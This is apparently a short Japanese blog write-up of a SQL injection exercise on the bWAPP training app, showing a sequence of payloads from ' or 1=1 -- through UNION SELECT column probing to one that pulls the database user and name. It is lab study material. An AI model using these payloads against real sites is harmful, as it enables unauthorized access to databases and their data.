shikata ga nai

Private? There is no such things.

bWAPPでA1-SQL Injection (Search/GET)

Hello there, ('ω')ノ

 

こんなインジェクションもやっていなかったものかと。

 

f:id:ThisIsOne:20201030161323p:plain

 

まずは、正常動作確認を。

 

f:id:ThisIsOne:20201030161558p:plain

 

もうひとつ。

 

f:id:ThisIsOne:20201030161638p:plain

 

下記のいつものパターンを入力すると脆弱性があることがわかったので。

 ' or 1=1 -- 

 

f:id:ThisIsOne:20201030161741p:plain

 

もう少し情報収集をしたいので、とりあえず下記のコードを入力すると。

Syntaxエラーがでたので。

 ' union select 1,2,3,4,5 -- 

 

f:id:ThisIsOne:20201030161917p:plain

 

最後のコメントアウトのところを別のコードに変更してみると。

どうやら機能したみたいで。

ただ、カラム数がちがうとのことで。

 ' union select 1,2,3,4,5 #

 

f:id:ThisIsOne:20201030162018p:plain

 

試行錯誤した結果、カラム数は7個らしく。

 ' union select 1,2,3,4,5,6,7 #

 

f:id:ThisIsOne:20201030162119p:plain

 

表示されたカラムの箇所をつかって情報取集を。

 ' union select 1,user(),database(),4,5,6,7 #

 

f:id:ThisIsOne:20201030162253p:plain

 

Best regards, (^^ゞ

ひとりひとりの自覚をもった行動で、医療従事者と保健所職員を助けよう。

f:id:ThisIsOne:20200404115457p:plain